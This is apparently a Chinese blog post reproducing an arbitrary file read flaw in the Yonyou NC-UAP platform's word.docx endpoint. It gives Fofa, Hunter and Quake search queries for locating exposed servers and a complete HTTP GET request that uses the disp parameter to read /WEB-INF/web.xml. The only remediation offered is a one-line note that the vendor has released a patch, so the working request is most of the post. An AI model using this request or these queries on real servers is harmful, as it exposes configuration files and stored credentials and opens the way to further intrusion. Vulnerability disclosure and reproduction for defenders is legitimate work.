用友NC word.docx 任意文件读取漏洞复现

0x01 产品描述:

用友NC-UAP平台是用友UFIDA系列的核心组成部分,旨在为企业提供一个强大的业务应用和信息化基础架构。作为NC产品体系的基础,NCUAP支持构建和集成各类企业级应用,包括但不限于工作流、审批流、预警平台等,并且能够与其他第三方系统无缝对接
0x02 漏洞描述:

用友NC-UAP平台word.docx存在任意文件读取漏洞,攻击者可以通过漏洞读取服务器上的敏感文件,包括配置文件、保存的账号密码等敏感信息从而导致进一步攻击。
0x03 搜索语句:

Fofa:app="用友-UFIDA-NC" || body="/Client/Uclient/UClient.dmg"

Hunter:body="/Client/Uclient/UClient.dmg"

Quake:body="/Client/Uclient/UClient.dmg"


0x04 漏洞复现:

复制代码
GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Host: your-ip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
Cookie: JSESSIONID=722CE6F799BBDE1ED1AFA8DC032B06C0.ncServer; JSESSIONID=6BDD75C8E88EE19ED89FF84865C74059.ncServer
If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT
If-None-Match: W/"15737-1546825364907"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36


0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
hui133630982161 小时前
远程倾斜位移裂缝计:守护工程结构安全的 “智能监测卫士”
安全
wzx_Eleven3 小时前
【论文阅读】多密钥低通信轮次的联邦学习安全聚合
论文阅读·深度学习·神经网络·安全·同态加密
墨北x3 小时前
2025江西省职业院校技能“信创适配及安全管理“赛项解析答案
服务器·网络·安全
MarkHD3 小时前
车辆TBOX科普 第60次 深度解析系统集成与EMC、功能安全及网络安全测试
网络·安全·web安全
RT-Thread物联网操作系统3 小时前
RT-Thread软件包,RyanMqtt 2.0 发布,全面重构:更轻、更快、更安全、更可靠 | 技术集结
安全·重构
骥龙4 小时前
3.11、终端安全最后一道屏障:EDR 原理与 Evil-WinRM 实战
网络·安全·网络安全
飞函安全4 小时前
私有化一站式办公平台,协同办公更高效
运维·安全·信息与通信
九章-4 小时前
平滑替换:大唐经研院经济评价系统成功完成国产化迁移
数据库·安全·政务
乐迪信息4 小时前
乐迪信息:AI摄像机+反光衣佩戴检测,保障智慧煤矿人员作业安全
大数据·运维·人工智能·物联网·安全
互联网科技看点5 小时前
中科天玑携“社会认知大脑”亮相第五届网络空间内生安全学术大会
安全